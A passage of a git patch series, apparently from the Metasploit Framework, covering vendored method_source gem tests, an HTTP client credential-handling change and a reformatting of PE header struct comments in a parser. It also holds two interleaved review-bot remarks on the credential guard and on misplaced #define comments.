s.test_files = ["test/test.rb", "test/test_helper.rb"] + + if s.respond_to? :specification_version then + s.specification_version = 3 + + if Gem::Version.new(Gem::VERSION) >= Gem::Version.new('1.2.0') then + s.add_development_dependency(%q, ["~> 1.1.0"]) + s.add_development_dependency(%q, ["~> 0.9"]) + else + s.add_dependency(%q, ["~> 1.1.0"]) + s.add_dependency(%q, ["~> 0.9"]) + end + else + s.add_dependency(%q, ["~> 1.1.0"]) + s.add_dependency(%q, ["~> 0.9"]) + end +end diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/test/test.rb b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/test/test.rb new file mode 100644 index 0000000000..425e56acf9 --- /dev/null 
+++ b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/test/test.rb 
@@ -0,0 +1,122 @@ +direc = File.dirname(__FILE__) + +require 'rubygems' +require 'bacon' +require "#{direc}/../lib/method_source" +require "#{direc}/test_helper" + +describe MethodSource do + + describe "source_location (testing 1.8 implementation)" do + it 'should return correct source_location for a method' do + method(:hello).source_location.first.should =~ /test_helper/ + end + + it 'should not raise for immediate instance methods' do + [Symbol, Fixnum, TrueClass, FalseClass, NilClass].each do |immediate_class| + lambda { immediate_class.instance_method(:to_s).source_location }.should.not.raise + end + end + + it 'should not raise for immediate methods' do + [:a, 1, true, false, nil].each do |immediate| + lambda { immediate.method(:to_s).source_location }.should.not.raise + end + end + end + + before do + @hello_module_source = " def hello; :hello_module; end\n" + @hello_singleton_source = "def $o.hello; :hello_singleton; end\n" + @hello_source = "def hello; :hello; end\n" + @hello_comment = "# A comment for hello\n# It spans two lines and is indented by 2 spaces\n" + @lambda_comment = "# This is a comment for MyLambda\n" + @lambda_source = "MyLambda = lambda { :lambda }\n" + @proc_source = "MyProc = Proc.new { :proc }\n" + end + + it 'should define methods on Method and UnboundMethod and Proc' do + Method.method_defined?(:source).should == true + UnboundMethod.method_defined?(:source).should == true + Proc.method_defined?(:source).should == true + end + + describe "Methods" do + it 'should return source for method' do + method(:hello).source.should == @hello_source + end + + it 'should return source for a method defined in a module' do + M.instance_method(:hello).source.should == @hello_module_source + end + + it 'should return source for a singleton method as an instance method' do + class << $o; self; end.instance_method(:hello).source.should == @hello_singleton_source + end + + it 'should return source for a singleton method' do + 
$o.method(:hello).source.should == @hello_singleton_source + end + + + it 'should return a comment for method' do + method(:hello).comment.should == @hello_comment + end + + + if !is_rbx? + it 'should raise for C methods' do + lambda { method(:puts).source }.should.raise RuntimeError + end + end + end + + # if RUBY_VERSION =~ /1.9/ || is_rbx? + describe "Lambdas and Procs" do + it 'should return source for proc' do + MyProc.source.should == @proc_source + end + + it 'should return an empty string if there is no comment' do + MyProc.comment.should == '' + end + + it 'should return source for lambda' do + MyLambda.source.should == @lambda_source + end + + it 'should return comment for lambda' do + MyLambda.comment.should == @lambda_comment + end + end + # end + describe "Comment tests" do + before do + @comment1 = "# a\n# b\n" + @comment2 = "# a\n# b\n" + @comment3 = "# a\n#\n# b\n" + @comment4 = "# a\n# b\n" + @comment5 = "# a\n# b\n# c\n# d\n" + end + + it "should correctly extract multi-line comments" do + method(:comment_test1).comment.should == @comment1 + end + + it "should correctly strip leading whitespace before comments" do + method(:comment_test2).comment.should == @comment2 + end + + it "should keep empty comment lines" do + method(:comment_test3).comment.should == @comment3 + end + + it "should ignore blank lines between comments" do + method(:comment_test4).comment.should == @comment4 + end + + it "should align all comments to same indent level" do + method(:comment_test5).comment.should == @comment5 + end + end +end diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/test/test_helper.rb b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/test/test_helper.rb new file mode 100644 index 0000000000..53da4e519c --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/test/test_helper.rb 
@@ -0,0 +1,50 @@ +def is_rbx? + defined?(RUBY_ENGINE) && RUBY_ENGINE =~ /rbx/ +end + +def jruby? + defined?(RUBY_ENGINE) && RUBY_ENGINE =~ /jruby/ +end + + +module M + def hello; :hello_module; end +end + +$o = Object.new +def $o.hello; :hello_singleton; end + +# A comment for hello + + # It spans two lines and is indented by 2 spaces +def hello; :hello; end + +# a +# b +def comment_test1; end + + # a + # b +def comment_test2; end + +# a +# +# b +def comment_test3; end + +# a + +# b +def comment_test4; end + + +# a + # b + # c +# d +def comment_test5; end + +# This is a comment for MyLambda +MyLambda = lambda { :lambda } +MyProc = Proc.new { :proc } + diff --git a/lib/msf/core/auxiliary/web/http.rb b/lib/msf/core/auxiliary/web/http.rb index 00ee6c1e5b..2ad3dbcb19 100644 --- a/lib/msf/core/auxiliary/web/http.rb +++ b/lib/msf/core/auxiliary/web/http.rb @@ -107,7 +107,6 @@ class Auxiliary::Web::HTTP {}, opts[:target].ssl, 'SSLv23', - nil, username, password ) @@ -300,8 +299,10 @@ class Auxiliary::Web::HTTP opts['data'] = body if body c = connect - c.username = username - c.password = password + if opts['username'] and opts['username'] != '' + c.username = opts['username'].to_s + c.password = opts['password'].to_s + end Response.from_rex_response c.send_recv( c.request_cgi( opts ), timeout ) rescue ::Timeout::Error Response.timed_out From f5c23e4b0208617b12aa1cfe633fd203d12d5664 Mon Sep 17 00:00:00 2001 From: David Maloney Date: Tue, 5 Mar 2013 12:35:21 -0600 Subject: [PATCH 79/87] fix typo snaffu --- lib/msf/core/auxiliary/web/http.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/lib/msf/core/auxiliary/web/http.rb b/lib/msf/core/auxiliary/web/http.rb index 2ad3dbcb19..166370abbc 100644 --- a/lib/msf/core/auxiliary/web/http.rb +++ b/lib/msf/core/auxiliary/web/http.rb @@ -107,6 +107,7 @@ class Auxiliary::Web::HTTP {}, opts[:target].ssl, 'SSLv23', + nil, username, password ) From a64edb33c4742ff376eaf3fdcd8b35abe364e5d6 Mon Sep 17 00:00:00 2001 
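Review bot: The guard added in the second `http.rb` hunk (`@@ -300,8 +299,10 @@`) only ever assigns `c.username`/`c.password` and never clears them, and it drops the previous unconditional assignment from the instance-level `username`/`password`. If `connect` returns a reused client (not visible in this hunk), credentials set by one call with `opts['username']` would remain on `c` and be sent with later requests that pass none, possibly to a path that should be fetched unauthenticated. I would make the fallback explicit with `else` / `c.username = username` / `c.password = password`, and write the test as `unless opts['username'].to_s.empty?`. The enclosing method starts and ends outside the hunk.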
From: James Lee
Date: Tue, 5 Mar 2013 14:34:11 -0600
Subject: [PATCH 80/87] Make code sections look right in docs
---
lib/rex/peparsey/pebase.rb | 588 ++++++++++++++++++-------------------
1 file changed, 286 insertions(+), 302 deletions(-)
diff --git a/lib/rex/peparsey/pebase.rb b/lib/rex/peparsey/pebase.rb
index cb0af219e2..bf268e6b36 100644
--- a/lib/rex/peparsey/pebase.rb
+++ b/lib/rex/peparsey/pebase.rb
@@ -12,34 +12,31 @@ class PeBase # #define IMAGE_DOS_SIGNATURE 0x5A4D // MZ - IMAGE_DOS_SIGNATURE = 0x5a4d - # - # typedef struct _IMAGE_DOS_HEADER { // DOS .EXE header - # WORD e_magic; // Magic number - # WORD e_cblp; // Bytes on last page of file - # WORD e_cp; // Pages in file - # WORD e_crlc; // Relocations - # WORD e_cparhdr; // Size of header in paragraphs - # WORD e_minalloc; // Minimum extra paragraphs needed - # WORD e_maxalloc; // Maximum extra paragraphs needed - # WORD e_ss; // Initial (relative) SS value - # WORD e_sp; // Initial SP value - # WORD e_csum; // Checksum - # WORD e_ip; // Initial IP value - # WORD e_cs; // Initial (relative) CS value - # WORD e_lfarlc; // File address of relocation table - # WORD e_ovno; // Overlay number - # WORD e_res[4]; // Reserved words - # WORD e_oemid; // OEM identifier (for e_oeminfo) - # WORD e_oeminfo; // OEM information; e_oemid specific - # WORD e_res2[10]; // Reserved words - # LONG e_lfanew; // File address of new exe header - # } IMAGE_DOS_HEADER, *PIMAGE_DOS_HEADER; - # - IMAGE_DOS_HEADER_SIZE = 64 + # Struct + # typedef struct _IMAGE_DOS_HEADER { // DOS .EXE header + # WORD e_magic; // Magic number + # WORD e_cblp; // Bytes on last page of file + # WORD e_cp; // Pages in file + # WORD e_crlc; // Relocations + # WORD e_cparhdr; // Size of header in paragraphs + # WORD e_minalloc; // Minimum extra paragraphs needed + # WORD e_maxalloc; // Maximum extra paragraphs needed + # WORD e_ss; // Initial (relative) SS value + # WORD e_sp; // Initial SP value + # WORD e_csum; // Checksum + # WORD e_ip; // Initial IP value + # WORD e_cs; // Initial (relative) CS value + # WORD e_lfarlc; // File address of relocation table + # WORD e_ovno; // Overlay number + # WORD e_res[4]; // Reserved words + # WORD e_oemid; // OEM identifier (for e_oeminfo) + # WORD e_oeminfo; // OEM information; e_oemid specific + # WORD e_res2[10]; // Reserved words + # LONG e_lfanew; // File address of new exe header + # } IMAGE_DOS_HEADER, 
*PIMAGE_DOS_HEADER; IMAGE_DOS_HEADER = Rex::Struct2::CStructTemplate.new( [ 'uint16v', 'e_magic', IMAGE_DOS_SIGNATURE ], [ 'uint16v', 'e_cblp', 0 ], @@ -142,31 +139,29 @@ class PeBase return DosHeader.new(rawdata) end - # - # typedef struct _IMAGE_FILE_HEADER { - # WORD Machine; - # WORD NumberOfSections; - # DWORD TimeDateStamp; - # DWORD PointerToSymbolTable; - # DWORD NumberOfSymbols; - # WORD SizeOfOptionalHeader; - # WORD Characteristics; - # } IMAGE_FILE_HEADER, *PIMAGE_FILE_HEADER; - # # #define IMAGE_NT_SIGNATURE 0x00004550 // PE00 - # #define IMAGE_FILE_MACHINE_I386 0x014c // Intel 386. - # #define IMAGE_FILE_MACHINE_IA64 0x0200 // Intel 64 - # #define IMAGE_FILE_MACHINE_ALPHA64 0x0284 // ALPHA64 - # #define IMAGE_FILE_MACHINE_AMD64 0x8664 // AMD64 (K8) - # #define IMAGE_SIZEOF_FILE_HEADER 20 - # - IMAGE_NT_SIGNATURE = 0x00004550 + # #define IMAGE_FILE_MACHINE_I386 0x014c // Intel 386. IMAGE_FILE_MACHINE_I386 = 0x014c + # #define IMAGE_FILE_MACHINE_IA64 0x0200 // Intel 64 IMAGE_FILE_MACHINE_IA64 = 0x0200 + # #define IMAGE_FILE_MACHINE_ALPHA64 0x0284 // ALPHA64 IMAGE_FILE_MACHINE_ALPHA64 = 0x0284 + # #define IMAGE_FILE_MACHINE_AMD64 0x8664 // AMD64 (K8) IMAGE_FILE_MACHINE_AMD64 = 0x8664 + # #define IMAGE_SIZEOF_FILE_HEADER 20 IMAGE_FILE_HEADER_SIZE = 20+4 # because we include the signature + + # C struct defining the PE file header + # typedef struct _IMAGE_FILE_HEADER { + # WORD Machine; + # WORD NumberOfSections; + # DWORD TimeDateStamp; + # DWORD PointerToSymbolTable; + # DWORD NumberOfSymbols; + # WORD SizeOfOptionalHeader; + # WORD Characteristics; + # } IMAGE_FILE_HEADER, *PIMAGE_FILE_HEADER; IMAGE_FILE_HEADER = Rex::Struct2::CStructTemplate.new( # not really in the header, but easier for us this way [ 'uint32v', 'NtSignature', 0 ], 
@@ -222,24 +217,23 @@ class PeBase return FileHeader.new(rawdata) end - # - # typedef struct _IMAGE_IMPORT_DESCRIPTOR { - # union { - # DWORD Characteristics; // 0 for terminating null import descriptor - # DWORD OriginalFirstThunk; // RVA to original unbound IAT (PIMAGE_THUNK_DATA) - # }; - # DWORD TimeDateStamp; // 0 if not bound, - # // -1 if bound, and real date\time stamp - # // in IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT (new BIND) - # // O.W. date/time stamp of DLL bound to (Old BIND) - # - # DWORD ForwarderChain; // -1 if no forwarders - # DWORD Name; - # DWORD FirstThunk; // RVA to IAT (if bound this IAT has actual addresses) - # } IMAGE_IMPORT_DESCRIPTOR; - # IMAGE_ORDINAL_FLAG32 = 0x80000000 IMAGE_IMPORT_DESCRIPTOR_SIZE = 20 + # Struct + # typedef struct _IMAGE_IMPORT_DESCRIPTOR { + # union { + # DWORD Characteristics; // 0 for terminating null import descriptor + # DWORD OriginalFirstThunk; // RVA to original unbound IAT (PIMAGE_THUNK_DATA) + # }; + # DWORD TimeDateStamp; // 0 if not bound, + # // -1 if bound, and real date\time stamp + # // in IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT (new BIND) + # // O.W. date/time stamp of DLL bound to (Old BIND) + # + # DWORD ForwarderChain; // -1 if no forwarders + # DWORD Name; + # DWORD FirstThunk; // RVA to IAT (if bound this IAT has actual addresses) + # } IMAGE_IMPORT_DESCRIPTOR; IMAGE_IMPORT_DESCRIPTOR = Rex::Struct2::CStructTemplate.new( [ 'uint32v', 'OriginalFirstThunk', 0 ], [ 'uint32v', 'TimeDateStamp', 0 ], @@ -248,11 +242,10 @@ class PeBase [ 'uint32v', 'FirstThunk', 0 ] ) - # - # typedef struct _IMAGE_IMPORT_BY_NAME { - # WORD Hint; - # BYTE Name[1]; - # } IMAGE_IMPORT_BY_NAME, *PIMAGE_IMPORT_BY_NAME; + # typedef struct _IMAGE_IMPORT_BY_NAME { + # WORD Hint; + # BYTE Name[1]; + # } IMAGE_IMPORT_BY_NAME, *PIMAGE_IMPORT_BY_NAME; # class ImportDescriptor 
@@ -271,22 +264,22 @@ class PeBase end end - # - # typedef struct _IMAGE_EXPORT_DIRECTORY { - # DWORD Characteristics; - # DWORD TimeDateStamp; - # WORD MajorVersion; - # WORD MinorVersion; - # DWORD Name; - # DWORD Base; - # DWORD NumberOfFunctions; - # DWORD NumberOfNames; - # DWORD AddressOfFunctions; // RVA from base of image - # DWORD AddressOfNames; // RVA from base of image - # DWORD AddressOfNameOrdinals; // RVA from base of image - # } IMAGE_EXPORT_DIRECTORY, *PIMAGE_EXPORT_DIRECTORY; - # + # sizeof(struct _IMAGE_EXPORT_DESCRIPTOR) IMAGE_EXPORT_DESCRIPTOR_SIZE = 40 + # Struct defining the export table + # typedef struct _IMAGE_EXPORT_DIRECTORY { + # DWORD Characteristics; + # DWORD TimeDateStamp; + # WORD MajorVersion; + # WORD MinorVersion; + # DWORD Name; + # DWORD Base; + # DWORD NumberOfFunctions; + # DWORD NumberOfNames; + # DWORD AddressOfFunctions; // RVA from base of image + # DWORD AddressOfNames; // RVA from base of image + # DWORD AddressOfNameOrdinals; // RVA from base of image + # } IMAGE_EXPORT_DIRECTORY, *PIMAGE_EXPORT_DIRECTORY; IMAGE_EXPORT_DESCRIPTOR = Rex::Struct2::CStructTemplate.new( [ 'uint32v', 'Characteristics', 0 ], [ 'uint32v', 'TimeDateStamp', 0 ], @@ -320,12 +313,6 @@ class PeBase end end - # - # typedef struct _IMAGE_DATA_DIRECTORY { - # DWORD VirtualAddress; - # DWORD Size; - # } IMAGE_DATA_DIRECTORY, *PIMAGE_DATA_DIRECTORY; - # IMAGE_NUMBEROF_DIRECTORY_ENTRIES = 16 IMAGE_DATA_DIRECTORY_SIZE = 8 IMAGE_DIRECTORY_ENTRY_EXPORT = 0 
@@ -344,57 +331,62 @@ class PeBase IMAGE_DIRECTORY_ENTRY_IAT = 12 IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT = 13 IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR = 14 + # Struct + # typedef struct _IMAGE_DATA_DIRECTORY { + # DWORD VirtualAddress; + # DWORD Size; + # } IMAGE_DATA_DIRECTORY, *PIMAGE_DATA_DIRECTORY; IMAGE_DATA_DIRECTORY = Rex::Struct2::CStructTemplate.new( [ 'uint32v', 'VirtualAddress', 0 ], [ 'uint32v', 'Size', 0 ] ) + # Struct + # typedef struct _IMAGE_OPTIONAL_HEADER { + # // + # // Standard fields. + # // # - # typedef struct _IMAGE_OPTIONAL_HEADER { - # // - # // Standard fields. - # // + # WORD Magic; + # BYTE MajorLinkerVersion; + # BYTE MinorLinkerVersion; + # DWORD SizeOfCode; + # DWORD SizeOfInitializedData; + # DWORD SizeOfUninitializedData; + # DWORD AddressOfEntryPoint; + # DWORD BaseOfCode; + # DWORD BaseOfData; # - # WORD Magic; - # BYTE MajorLinkerVersion; - # BYTE MinorLinkerVersion; - # DWORD SizeOfCode; - # DWORD SizeOfInitializedData; - # DWORD SizeOfUninitializedData; - # DWORD AddressOfEntryPoint; - # DWORD BaseOfCode; - # DWORD BaseOfData; + # // + # // NT additional fields. + # // # - # // - # // NT additional fields. 
- # // + # DWORD ImageBase; + # DWORD SectionAlignment; + # DWORD FileAlignment; + # WORD MajorOperatingSystemVersion; + # WORD MinorOperatingSystemVersion; + # WORD MajorImageVersion; + # WORD MinorImageVersion; + # WORD MajorSubsystemVersion; + # WORD MinorSubsystemVersion; + # DWORD Win32VersionValue; + # DWORD SizeOfImage; + # DWORD SizeOfHeaders; + # DWORD CheckSum; + # WORD Subsystem; + # WORD DllCharacteristics; + # DWORD SizeOfStackReserve; + # DWORD SizeOfStackCommit; + # DWORD SizeOfHeapReserve; + # DWORD SizeOfHeapCommit; + # DWORD LoaderFlags; + # DWORD NumberOfRvaAndSizes; + # IMAGE_DATA_DIRECTORY DataDirectory[IMAGE_NUMBEROF_DIRECTORY_ENTRIES]; + # } IMAGE_OPTIONAL_HEADER32, *PIMAGE_OPTIONAL_HEADER32; # - # DWORD ImageBase; - # DWORD SectionAlignment; - # DWORD FileAlignment; - # WORD MajorOperatingSystemVersion; - # WORD MinorOperatingSystemVersion; - # WORD MajorImageVersion; - # WORD MinorImageVersion; - # WORD MajorSubsystemVersion; - # WORD MinorSubsystemVersion; - # DWORD Win32VersionValue; - # DWORD SizeOfImage; - # DWORD SizeOfHeaders; - # DWORD CheckSum; - # WORD Subsystem; - # WORD DllCharacteristics; - # DWORD SizeOfStackReserve; - # DWORD SizeOfStackCommit; - # DWORD SizeOfHeapReserve; - # DWORD SizeOfHeapCommit; - # DWORD LoaderFlags; - # DWORD NumberOfRvaAndSizes; - # IMAGE_DATA_DIRECTORY DataDirectory[IMAGE_NUMBEROF_DIRECTORY_ENTRIES]; - # } IMAGE_OPTIONAL_HEADER32, *PIMAGE_OPTIONAL_HEADER32; - # - # #define IMAGE_NT_OPTIONAL_HDR32_MAGIC 0x10b - # #define IMAGE_SIZEOF_NT_OPTIONAL32_HEADER 224 + # #define IMAGE_NT_OPTIONAL_HDR32_MAGIC 0x10b + # #define IMAGE_SIZEOF_NT_OPTIONAL32_HEADER 224 # IMAGE_NT_OPTIONAL_HDR32_MAGIC = 0x10b 
@@ -450,46 +442,44 @@ class PeBase )] ) - # - # typedef struct _IMAGE_OPTIONAL_HEADER64 { - # USHORT Magic; - # UCHAR MajorLinkerVersion; - # UCHAR MinorLinkerVersion; - # ULONG SizeOfCode; - # ULONG SizeOfInitializedData; - # ULONG SizeOfUninitializedData; - # ULONG AddressOfEntryPoint; - # ULONG BaseOfCode; - # ULONGLONG ImageBase; - # ULONG SectionAlignment; - # ULONG FileAlignment; - # USHORT MajorOperatingSystemVersion; - # USHORT MinorOperatingSystemVersion; - # USHORT MajorImageVersion; - # USHORT MinorImageVersion; - # USHORT MajorSubsystemVersion; - # USHORT MinorSubsystemVersion; - # ULONG Win32VersionValue; - # ULONG SizeOfImage; - # ULONG SizeOfHeaders; - # ULONG CheckSum; - # USHORT Subsystem; - # USHORT DllCharacteristics; - # ULONGLONG SizeOfStackReserve; - # ULONGLONG SizeOfStackCommit; - # ULONGLONG SizeOfHeapReserve; - # ULONGLONG SizeOfHeapCommit; - # ULONG LoaderFlags; - # ULONG NumberOfRvaAndSizes; - # IMAGE_DATA_DIRECTORY DataDirectory[IMAGE_NUMBEROF_DIRECTORY_ENTRIES]; - # } IMAGE_OPTIONAL_HEADER64, *PIMAGE_OPTIONAL_HEADER64; - # - # #define IMAGE_NT_OPTIONAL_HDR64_MAGIC 0x20b # #define IMAGE_SIZEOF_NT_OPTIONAL64_HEADER 240 - # - IMAGE_NT_OPTIONAL_HDR64_MAGIC = 0x20b + # #define IMAGE_NT_OPTIONAL_HDR64_MAGIC 0x20b IMAGE_SIZEOF_NT_OPTIONAL64_HEADER = 240 + + # Struct + # typedef struct _IMAGE_OPTIONAL_HEADER64 { + # USHORT Magic; + # UCHAR MajorLinkerVersion; + # UCHAR MinorLinkerVersion; + # ULONG SizeOfCode; + # ULONG SizeOfInitializedData; + # ULONG SizeOfUninitializedData; + # ULONG AddressOfEntryPoint; + # ULONG BaseOfCode; + # ULONGLONG ImageBase; + # ULONG SectionAlignment; + # ULONG FileAlignment; + # USHORT MajorOperatingSystemVersion; + # USHORT MinorOperatingSystemVersion; + # USHORT MajorImageVersion; + # USHORT MinorImageVersion; + # USHORT MajorSubsystemVersion; + # USHORT MinorSubsystemVersion; + # ULONG Win32VersionValue; + # ULONG SizeOfImage; + # ULONG SizeOfHeaders; + # ULONG CheckSum; + # USHORT Subsystem; + # USHORT 
DllCharacteristics; + # ULONGLONG SizeOfStackReserve; + # ULONGLONG SizeOfStackCommit; + # ULONGLONG SizeOfHeapReserve; + # ULONGLONG SizeOfHeapCommit; + # ULONG LoaderFlags; + # ULONG NumberOfRvaAndSizes; + # IMAGE_DATA_DIRECTORY DataDirectory[IMAGE_NUMBEROF_DIRECTORY_ENTRIES]; + # } IMAGE_OPTIONAL_HEADER64, *PIMAGE_OPTIONAL_HEADER64; IMAGE_OPTIONAL_HEADER64 = Rex::Struct2::CStructTemplate.new( [ 'uint16v', 'Magic', 0 ], [ 'uint8', 'MajorLinkerVersion', 0 ], @@ -601,27 +591,24 @@ class PeBase end - # - # typedef struct _IMAGE_SECTION_HEADER { - # BYTE Name[IMAGE_SIZEOF_SHORT_NAME]; - # union { - # DWORD PhysicalAddress; - # DWORD VirtualSize; - # } Misc; - # DWORD VirtualAddress; - # DWORD SizeOfRawData; - # DWORD PointerToRawData; - # DWORD PointerToRelocations; - # DWORD PointerToLinenumbers; - # WORD NumberOfRelocations; - # WORD NumberOfLinenumbers; - # DWORD Characteristics; - # } IMAGE_SECTION_HEADER, *PIMAGE_SECTION_HEADER; - # # #define IMAGE_SIZEOF_SECTION_HEADER 40 - # - IMAGE_SIZEOF_SECTION_HEADER = 40 + # Struct + # typedef struct _IMAGE_SECTION_HEADER { + # BYTE Name[IMAGE_SIZEOF_SHORT_NAME]; + # union { + # DWORD PhysicalAddress; + # DWORD VirtualSize; + # } Misc; + # DWORD VirtualAddress; + # DWORD SizeOfRawData; + # DWORD PointerToRawData; + # DWORD PointerToRelocations; + # DWORD PointerToLinenumbers; + # WORD NumberOfRelocations; + # WORD NumberOfLinenumbers; + # DWORD Characteristics; + # } IMAGE_SECTION_HEADER, *PIMAGE_SECTION_HEADER; IMAGE_SECTION_HEADER = Rex::Struct2::CStructTemplate.new( [ 'string', 'Name', 8, '' ], [ 'uint32v', 'Misc', 0 ], 
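Review bot: After the `@@ -450,46 +442,44 @@` hunk the two `#define` comments sit above the wrong constants, as far as the collapsed hunk can be read: `# #define IMAGE_SIZEOF_NT_OPTIONAL64_HEADER 240` ends up directly above `IMAGE_NT_OPTIONAL_HDR64_MAGIC = 0x20b`, and the added `# #define IMAGE_NT_OPTIONAL_HDR64_MAGIC 0x20b` is above `IMAGE_SIZEOF_NT_OPTIONAL64_HEADER = 240`. A documentation generator that attaches a comment to the constant below it would then describe each constant with the other's definition. Swapping the two comment lines would match the pattern used for the `IMAGE_FILE_MACHINE_*` constants earlier in this commit.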
@@ -669,17 +656,16 @@ class PeBase return section_headers end - # - # typedef struct _IMAGE_BASE_RELOCATION { - # DWORD VirtualAddress; - # DWORD SizeOfBlock; - # // WORD TypeOffset[1]; - # } IMAGE_BASE_RELOCATION; - # typedef IMAGE_BASE_RELOCATION UNALIGNED * PIMAGE_BASE_RELOCATION; - # # #define IMAGE_SIZEOF_BASE_RELOCATION 8 - # IMAGE_SIZEOF_BASE_RELOCATION = 8 + + # Struct + # typedef struct _IMAGE_BASE_RELOCATION { + # DWORD VirtualAddress; + # DWORD SizeOfBlock; + # // WORD TypeOffset[1]; + # } IMAGE_BASE_RELOCATION; + # typedef IMAGE_BASE_RELOCATION UNALIGNED * PIMAGE_BASE_RELOCATION; IMAGE_BASE_RELOCATION = Rex::Struct2::CStructTemplate.new( [ 'uint32v', 'VirtualAddress', 0 ], [ 'uint32v', 'SizeOfBlock', 0 ] 
@@ -739,29 +725,29 @@ class PeBase end end - # - # typedef struct { - # DWORD Size; - # DWORD TimeDateStamp; - # WORD MajorVersion; - # WORD MinorVersion; - # DWORD GlobalFlagsClear; - # DWORD GlobalFlagsSet; - # DWORD CriticalSectionDefaultTimeout; - # DWORD DeCommitFreeBlockThreshold; - # DWORD DeCommitTotalFreeThreshold; - # DWORD LockPrefixTable; // VA - # DWORD MaximumAllocationSize; - # DWORD VirtualMemoryThreshold; - # DWORD ProcessHeapFlags; - # DWORD ProcessAffinityMask; - # WORD CSDVersion; - # WORD Reserved1; - # DWORD EditList; // VA - # DWORD SecurityCookie; // VA - # DWORD SEHandlerTable; // VA - # DWORD SEHandlerCount; - # } IMAGE_LOAD_CONFIG_DIRECTORY32, *PIMAGE_LOAD_CONFIG_DIRECTORY32; + # Struct + # typedef struct { + # DWORD Size; + # DWORD TimeDateStamp; + # WORD MajorVersion; + # WORD MinorVersion; + # DWORD GlobalFlagsClear; + # DWORD GlobalFlagsSet; + # DWORD CriticalSectionDefaultTimeout; + # DWORD DeCommitFreeBlockThreshold; + # DWORD DeCommitTotalFreeThreshold; + # DWORD LockPrefixTable; // VA + # DWORD MaximumAllocationSize; + # DWORD VirtualMemoryThreshold; + # DWORD ProcessHeapFlags; + # DWORD ProcessAffinityMask; + # WORD CSDVersion; + # WORD Reserved1; + # DWORD EditList; // VA + # DWORD SecurityCookie; // VA + # DWORD SEHandlerTable; // VA + # DWORD SEHandlerCount; + # } IMAGE_LOAD_CONFIG_DIRECTORY32, *PIMAGE_LOAD_CONFIG_DIRECTORY32; # IMAGE_LOAD_CONFIG_DIRECTORY32 = Rex::Struct2::CStructTemplate.new( [ 'uint32v', 'Size', 0 ], 
@@ -786,30 +772,29 @@ class PeBase [ 'uint32v', 'SEHandlerCount', 0 ] ) - # - # typedef struct { - # ULONG Size; - # ULONG TimeDateStamp; - # USHORT MajorVersion; - # USHORT MinorVersion; - # ULONG GlobalFlagsClear; - # ULONG GlobalFlagsSet; - # ULONG CriticalSectionDefaultTimeout; - # ULONGLONG DeCommitFreeBlockThreshold; - # ULONGLONG DeCommitTotalFreeThreshold; - # ULONGLONG LockPrefixTable; // VA - # ULONGLONG MaximumAllocationSize; - # ULONGLONG VirtualMemoryThreshold; - # ULONGLONG ProcessAffinityMask; - # ULONG ProcessHeapFlags; - # USHORT CSDVersion; - # USHORT Reserved1; - # ULONGLONG EditList; // VA - # ULONGLONG SecurityCookie; // VA - # ULONGLONG SEHandlerTable; // VA - # ULONGLONG SEHandlerCount; - # } IMAGE_LOAD_CONFIG_DIRECTORY64, *PIMAGE_LOAD_CONFIG_DIRECTORY64; - # + # Struct + # typedef struct { + # ULONG Size; + # ULONG TimeDateStamp; + # USHORT MajorVersion; + # USHORT MinorVersion; + # ULONG GlobalFlagsClear; + # ULONG GlobalFlagsSet; + # ULONG CriticalSectionDefaultTimeout; + # ULONGLONG DeCommitFreeBlockThreshold; + # ULONGLONG DeCommitTotalFreeThreshold; + # ULONGLONG LockPrefixTable; // VA + # ULONGLONG MaximumAllocationSize; + # ULONGLONG VirtualMemoryThreshold; + # ULONGLONG ProcessAffinityMask; + # ULONG ProcessHeapFlags; + # USHORT CSDVersion; + # USHORT Reserved1; + # ULONGLONG EditList; // VA + # ULONGLONG SecurityCookie; // VA + # ULONGLONG SEHandlerTable; // VA + # ULONGLONG SEHandlerCount; + # } IMAGE_LOAD_CONFIG_DIRECTORY64, *PIMAGE_LOAD_CONFIG_DIRECTORY64; IMAGE_LOAD_CONFIG_DIRECTORY64 = Rex::Struct2::CStructTemplate.new( [ 'uint32v', 'Size', 0 ], [ 'uint32v', 'TimeDateStamp', 0 ], @@ -838,12 +823,14 @@ class PeBase end + #-- # doesn't seem to be used -- not compatible with 64-bit #def self._parse_config_header(rawdata) # header = IMAGE_LOAD_CONFIG_DIRECTORY32.make_struct # header.from_s(rawdata) # ConfigHeader.new(header) #end + #++ def _parse_config_header 
@@ -879,30 +866,29 @@ class PeBase # TLS Directory # - # - # typedef struct { - # DWORD Size; - # DWORD TimeDateStamp; - # WORD MajorVersion; - # WORD MinorVersion; - # DWORD GlobalFlagsClear; - # DWORD GlobalFlagsSet; - # DWORD CriticalSectionDefaultTimeout; - # DWORD DeCommitFreeBlockThreshold; - # DWORD DeCommitTotalFreeThreshold; - # DWORD LockPrefixTable; // VA - # DWORD MaximumAllocationSize; - # DWORD VirtualMemoryThreshold; - # DWORD ProcessHeapFlags; - # DWORD ProcessAffinityMask; - # WORD CSDVersion; - # WORD Reserved1; - # DWORD EditList; // VA - # DWORD SecurityCookie; // VA - # DWORD SEHandlerTable; // VA - # DWORD SEHandlerCount; - # } IMAGE_LOAD_CONFIG_DIRECTORY32, *PIMAGE_LOAD_CONFIG_DIRECTORY32; - # + # Struct + # typedef struct { + # DWORD Size; + # DWORD TimeDateStamp; + # WORD MajorVersion; + # WORD MinorVersion; + # DWORD GlobalFlagsClear; + # DWORD GlobalFlagsSet; + # DWORD CriticalSectionDefaultTimeout; + # DWORD DeCommitFreeBlockThreshold; + # DWORD DeCommitTotalFreeThreshold; + # DWORD LockPrefixTable; // VA + # DWORD MaximumAllocationSize; + # DWORD VirtualMemoryThreshold; + # DWORD ProcessHeapFlags; + # DWORD ProcessAffinityMask; + # WORD CSDVersion; + # WORD Reserved1; + # DWORD EditList; // VA + # DWORD SecurityCookie; // VA + # DWORD SEHandlerTable; // VA + # DWORD SEHandlerCount; + # } IMAGE_LOAD_CONFIG_DIRECTORY32, *PIMAGE_LOAD_CONFIG_DIRECTORY32; IMAGE_LOAD_TLS_DIRECTORY32 = 